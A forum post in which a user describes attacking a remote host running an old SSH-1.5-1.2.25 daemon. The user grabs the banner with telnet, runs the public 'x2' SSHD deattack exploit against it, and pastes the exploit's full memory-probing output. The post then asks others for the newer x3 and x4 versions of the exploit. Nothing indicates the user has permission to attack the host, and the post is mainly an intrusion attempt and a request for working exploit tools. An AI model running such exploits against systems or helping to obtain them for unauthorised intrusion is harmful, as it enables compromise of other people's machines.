Sign in to follow this  
Followers 0
Reaper45

looking for an exploit

1 post in this topic

I'm sure there are another holes in this host, but I'm curious since I never hacked through a front door like SSH, and this is the perfect chance. It looks like a default installation. Xprobe2 says that the host is running linux kernel 2.2.X. So I telneted to port 22 and...

fake@fake-desktop:~$ telnet xxx.xxx.xxx.xxx 22

Trying xxx.xxx.xxx.xxx...

Connected to xxx.xxx.xxx.xxx.

Escape character is '^]'.

SSH-1.5-1.2.25

Protocol mismatch.

Connection closed by foreign host.

Incredible right? So I ran to milw0rm and downloaded x2.tgz, an exploit made by some guy from team teso, which seems to have dissapeared already. I choose target 42 as it seems to be the right one in the targets.txt file.

fake@fake-desktop:~/$ ./x2 -t 42 xxx.xxx.xxx.xxx

SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Target: MNS quick - SSH-1.5-1.2.25

Attacking: xxx.xxx.xxx.xxx:22

Testing if remote sshd is vulnerable # ATTACH NOW

YES #

Finding h - buf distance (estimate)

(1 ) testing 0x00000004 # SEGV #

(2 ) testing 0x0000c804 # FOUND #

Found buffer, determining exact diff

Finding h - buf distance using the teso method

(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SURVIVED #

(4 ) binary-search: h: 0x083ff7fc, slider: 0x00004000 # SEGV #

(5 ) binary-search: h: 0x083fd7fc, slider: 0x00002000 # SURVIVED #

(6 ) binary-search: h: 0x083fe7fc, slider: 0x00001000 # SEGV #

(7 ) binary-search: h: 0x083fdffc, slider: 0x00000800 # SEGV #

(8 ) binary-search: h: 0x083fdbfc, slider: 0x00000400 # SURVIVED #

(9 ) binary-search: h: 0x083fddfc, slider: 0x00000200 # SURVIVED #

(10) binary-search: h: 0x083fdefc, slider: 0x00000100 # SEGV #

(11) binary-search: h: 0x083fde7c, slider: 0x00000080 # SURVIVED #

(12) binary-search: h: 0x083fdebc, slider: 0x00000040 # SEGV #

(13) binary-search: h: 0x083fde9c, slider: 0x00000020 # SURVIVED #

(14) binary-search: h: 0x083fdeac, slider: 0x00000010 # SEGV #

(15) binary-search: h: 0x083fdea4, slider: 0x00000008 # SURVIVED #

Bin search done, testing result

Finding exact h - buf distance

(16) trying: 0x083fdea4 # SEGV #

(17) trying: 0x083fdeac # SEGV #

(18) trying: 0x083fdeb4 # SEGV #

(19) trying: 0x083fdebc # SURVIVED #

Exact match found at: 0x00002144

Looking for exact buffer address

Finding exact buffer address

(20) Trying: 0x08072144 # SEGV #

(21) Trying: 0x08073144 # SEGV #

(22) Trying: 0x08074144 # SEGV #

(23) Trying: 0x08075144 # SEGV #

(24) Trying: 0x08076144 # SEGV #

(25) Trying: 0x08077144 # SEGV #

(26) Trying: 0x08078144 # SEGV #

(27) Trying: 0x08079144 # SEGV #

(28) Trying: 0x0807a144 # SEGV #

(29) Trying: 0x0807b144 # SEGV #

(30) Trying: 0x0807c144 # SEGV #

(31) Trying: 0x0807d144 # SEGV #

(32) Trying: 0x0807e144 # SEGV #

(33) Trying: 0x0807f144 # SEGV #

(34) Trying: 0x08080144 # SEGV #

(35) Trying: 0x08081144 # SEGV #

(36) Trying: 0x08082144 # SEGV #

(37) Trying: 0x08083144 # SEGV #

(38) Trying: 0x08084144 # SEGV #

(39) Trying: 0x08085144 # SEGV #

(40) Trying: 0x08086144 # SEGV #

(41) Trying: 0x08087144 # SEGV #

(42) Trying: 0x08088144 # SEGV #

(43) Trying: 0x08089144 # SEGV #

(44) Trying: 0x0808a144 # SEGV #

(45) Trying: 0x0808b144 # SEGV #

(46) Trying: 0x0808c144 # SEGV #

(47) Trying: 0x0808d144 # SEGV #

(48) Trying: 0x0808e144 # SEGV #

(49) Trying: 0x0808f144 # SEGV #

(50) Trying: 0x08090144 # SEGV #

(51) Trying: 0x08091144 # SEGV #

(52) Trying: 0x08092144 # SEGV #

(53) Trying: 0x08093144 # SEGV #

(54) Trying: 0x08094144 # SEGV #

(55) Trying: 0x08095144 # SEGV #

(56) Trying: 0x08096144 # SEGV #

(57) Trying: 0x08097144 # SEGV #

(58) Trying: 0x08098144 # SEGV #

(59) Trying: 0x08099144 # SEGV #

(60) Trying: 0x0809a144 # SEGV #

(61) Trying: 0x0809b144 # SEGV #

(62) Trying: 0x0809c144 # SEGV #

(63) Trying: 0x0809d144 # SEGV #

(64) Trying: 0x0809e144 # SEGV #

(65) Trying: 0x0809f144 # SEGV #

(66) Trying: 0x080a0144 #

From now on the exploit won't stop, it's quite clear it's vulnerable but it cannot find the buffer address in memory.

So I wanted to ask you if you had any of the other versions of this exploit. I'm aware that x3.tgz and x4.tgz exists, but I was not able to find them.

Edited by Reaper
0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0